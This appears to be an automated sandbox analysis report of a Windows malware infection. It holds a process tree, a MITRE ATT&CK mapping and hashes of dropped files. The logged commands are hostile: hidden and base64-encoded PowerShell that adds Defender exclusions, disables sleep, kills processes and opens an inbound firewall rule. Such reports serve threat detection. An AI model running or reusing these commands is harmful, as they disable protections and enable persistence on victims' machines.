C:\ProgramData\wikombernizc\reakuqnanrkn.exe"C:\ProgramData\wikombernizc\reakuqnanrkn.exe"3⤵PID:8004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:2216
-
-
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:2812
-
-
C:\Windows\system32\winsvc.exeC:\Windows\system32\winsvc.exe1⤵PID:6188
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""2⤵
- Command and Scripting Interpreter: PowerShell
PID:4324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""2⤵
- Command and Scripting Interpreter: PowerShell
PID:872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"2⤵
- Command and Scripting Interpreter: PowerShell
PID:6820 -
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c3⤵
- Power Settings
PID:4608
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:1124 -
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 03⤵
- Power Settings
PID:7160
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2128 -
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 03⤵
- Power Settings
PID:2476
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:4388 -
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4388" "1824" "1744" "1828" "0" "0" "1832" "0" "0" "0" "0" "0"3⤵PID:2944
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:5992 -
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 03⤵
- Power Settings
PID:1300
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" "/F" "/IM" "winnet.exe"2⤵
- Kills process with taskkill
PID:1164
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" "/F" "/IM" "winnet.exe"2⤵
- Kills process with taskkill
PID:1424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5620
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" "/F" "/IM" "wincfg.exe"2⤵
- Kills process with taskkill
PID:2116
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" "/F" "/IM" "wincfg.exe"2⤵
- Kills process with taskkill
PID:6780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""2⤵
- Command and Scripting Interpreter: PowerShell
PID:5552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "New-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\"" "-Program" "\"C:\Windows\system32\winnet.exe\"" "-Action" "Allow" "-Direction" "Inbound" "-EdgeTraversalPolicy" "Allow" "-Enabled" "True"2⤵
- Command and Scripting Interpreter: PowerShell
PID:988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6216 -ip 62161⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵PID:6040
-
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe1⤵PID:4704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6300 -ip 63001⤵PID:5648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6300 -ip 63001⤵PID:6928
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4596 -ip 45961⤵PID:6928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4580 -ip 45801⤵PID:3976
-
C:\Windows\system32\winsvc.exeC:\Windows\system32\winsvc.exe1⤵PID:2052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""2⤵
- Command and Scripting Interpreter: PowerShell
PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""2⤵
- Command and Scripting Interpreter: PowerShell
PID:8000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"2⤵
- Command and Scripting Interpreter: PowerShell
PID:7736 -
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c3⤵
- Power Settings
PID:2208
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:6544 -
C:\Windows\system32\powercfg.exe"C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 03⤵
- Power Settings
PID:7380
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:8096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"2⤵
- Command and Scripting Interpreter: PowerShell
PID:2140
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" "/F" "/IM" "winnet.exe"2⤵
- Kills process with taskkill
PID:2656
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" "/F" "/IM" "winnet.exe"2⤵
- Kills process with taskkill
PID:6924
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" "/F" "/IM" "wincfg.exe"2⤵
- Kills process with taskkill
PID:5692
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" "/F" "/IM" "wincfg.exe"2⤵
- Kills process with taskkill
PID:6420
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARgBhAGwAbABiAGEAYwBrAEIAdQBmAGYAZQByAC4AZQB4AGUAOwA=1⤵
- Command and Scripting Interpreter: PowerShell
PID:7248
-
C:\Users\Admin\AppData\Local\Temp\PYdNtka8eSZoE\Y-Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\PYdNtka8eSZoE\Y-Cleaner.exe"1⤵PID:3836
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://g-cleanit.hk/2⤵PID:1840
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa952446f8,0x7ffa95244708,0x7ffa952447183⤵PID:180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:23⤵PID:8060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:33⤵PID:7660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:83⤵PID:8084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:13⤵PID:5948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:13⤵PID:5788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:13⤵PID:5184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:13⤵PID:4596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:13⤵PID:8068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:13⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:13⤵PID:7440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:13⤵PID:7088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2352 /prefetch:23⤵PID:7020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3516 /prefetch:83⤵PID:6228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3516 /prefetch:83⤵PID:8088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2460 /prefetch:23⤵PID:1728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:13⤵PID:5192
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://g-cleanit.hk/2⤵PID:3976
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa952446f8,0x7ffa95244708,0x7ffa952447183⤵PID:5724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2950855930507613889,4172340903040229660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:33⤵PID:7476
-
-
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵PID:5692
-
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exeC:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe1⤵PID:6796
-
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe1⤵PID:7536
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4140
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6532
-
C:\Users\Admin\AppData\Local\Current\ndebzhaer\FallbackBuffer.exeC:\Users\Admin\AppData\Local\Current\ndebzhaer\FallbackBuffer.exe1⤵PID:5688
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:6720
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:7684
-
C:\ProgramData\WindowsServices\WindowsAutHostC:\ProgramData\WindowsServices\WindowsAutHost1⤵PID:5924
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:7596
-
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exeC:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe1⤵PID:7600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1824 -ip 18241⤵PID:7600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1996 -ip 19961⤵PID:7528
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:5860
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
384B
MD54be7938c6782739b82cedb22d201c678
SHA1b42912e5702f23636cad17e1659a26bdbff16030
SHA256470e4a3de44c568c46f7f8e30185c14ccd891f30b569ed4cb9d4822ecc7426c4
SHA5125e1a1f9657dc5e6d41a58727e630b5203da8ea6cff5e54e0b5962f2b5d469ad2350aada051d4333084bf51f98291c7b72ea6482ba9b1a9c383016f0b1b359148
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
3KB
MD593ad9f7257b608ecae28a40a39415852
SHA1a069ba8157e0fb445e95affa078b88894a3010c7
SHA256c9b2f28e26a8dbd6a4c9acc6ad5f68f94a828992befcdc33d0d6a0c5b09f1e94
SHA51292365f1658a379e8dc273c8b91575d519efad96729a03f91d3f87aba5223b32782933560209bc097171a44546a857f14b9dab571fc8365760bf85658c0f3f86f
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
690B
MD585b0bbccb9c35ff7b87bbcfa9ed58916
SHA177070c35b23016849574f93dfdabb5744fa31ed5
SHA256323d9d9a8efc1c01e14c0730e8c1950d743cf39ec6f0952a5b8260924e97f635
SHA512ef97d9119f1c6b7a6facf54c53a074e2f664ff15caf0ddd43432d0b98bda84af83c2875419140f4e7e8ac18bacf253e63718ec8d393321116bef2439a12501a3
-
Filesize
7KB
MD53d5737157513abcdf50b90c259d58ae3
SHA113e5737fb8b12dfaa3d9fe1a4e2167db40c5493f
SHA256ca588ada6e705a15ed5835855dc40ed195be6c29b07b0e6234efd95b31e9d56d
SHA5125d6a329a9fa846856c7f522f8b2896312e6ec8a79ca105e5a674aaf948c1cfcbb19dd251b1eaf542b90196d8354952298e7316530216b575c8211828b8000536
-
Filesize
138KB
MD547cc6dd8e4fb7ab85041fada79f09cae
SHA1c52cb7b685e34a809c33cb3e29d7637447d04652
SHA256057468e3355a4ccce0ffaafa4252be9e3ea5fd4db3d32649cb00f30dc8b472b8
SHA512ac2e909360017afb198ec6053c3a6dd285ea8a46f9bc45ffcb428be280328264da678f0419351c34833d6f765cf30ea7f18cabdcca5396f004f871cfca505e4c
-
Filesize
152B
MD5b4a74bc775caf3de7fc9cde3c30ce482
SHA1c6ed3161390e5493f71182a6cb98d51c9063775d
SHA256dfad4e020a946f85523604816a0a9781091ee4669c870db2cabab027f8b6f280
SHA51255578e254444a645f455ea38480c9e02599ebf9522c32aca50ff37aad33976db30e663d35ebe31ff0ecafb4007362261716f756b3a0d67ac3937ca62ff10e25f
-
Filesize
152B
MD5c5abc082d9d9307e797b7e89a2f755f4
SHA154c442690a8727f1d3453b6452198d3ec4ec13df
SHA256a055d69c6aba59e97e632d118b7960a5fdfbe35cfdfaa0de14f194fc6f874716
SHA512ad765cddbf89472988de5356db5e0ee254ca3475491c6034fba1897c373702ab7cfa4bd21662ab862eebb48a757c3eb86b1f8ed58629751f71863822a59cd26c
-
Filesize
180B
MD500a455d9d155394bfb4b52258c97c5e5
SHA12761d0c955353e1982a588a3df78f2744cfaa9df
SHA25645a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed
SHA5129553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f
-
Filesize
5KB
MD5caec05d88c16e2908d323ad245b0e52a
SHA1229406af1074dfa02534dbc8ebe9530db065cdbc
SHA2565d57beb212d7bef13c161689b27797540707818f2b794acbbe760682fa3d068f
SHA512c2f19b03c3b63f68ea972762c28ff7f9ced80863dd6ed25781bdd164b1b835f4766f918f6e5f7d7f4f5fe5b5e1226d2f522ca043ae59ef48fc009ac13838b9c9
-
Filesize
6KB
MD5ff9a6b349b25b9703d8db4474f610af2
SHA11fdc692436a01b1c0f688542f1d4306fed3fad30
SHA256768ac145eddd4b7db689f8dbb96e78168d1ab8868342af845c794bf016997d6b
SHA512fd78c3368e6dd85c17b87000cc9157b7b73f8fd3fb92e28c3350167007476dec997aac4f2af6acb3a70cff860715c38da5caa166f4cd58069c94633aa9dff823
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
8KB
MD5f14c1ef19777762f1ed6957705392286
SHA11817ca56a9f71b35717ce276ed3d5663a854cc8f
SHA256cec31853eeb2b7a5644679e40c668629975e890a515caa0849fde189daa1aede
SHA512ec18a7f503587719b848fa9fb64f14164851342046c4d2164e656b56039d25c32a25d066c02476e2efc58643c36510ef12cdfc733d68318cb69f878e8dc91c10
-
Filesize
11KB
MD54cd6af2f1287d833130fae63506aefdf
SHA1c2e49b471e2b9be86d0b83d2320a4efd24420ce6
SHA256d8018c5127b08c113db8da6878d7abf275652cf9c4d219881cf723544594e60d
SHA512557537fb506f2c6a0362ac6da510b7cf51314c9413dab9d3e458999c1670e54cc57da3105500b79bc433b580243c480641c71f24ca8c6917eb06aabc5caca20f
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
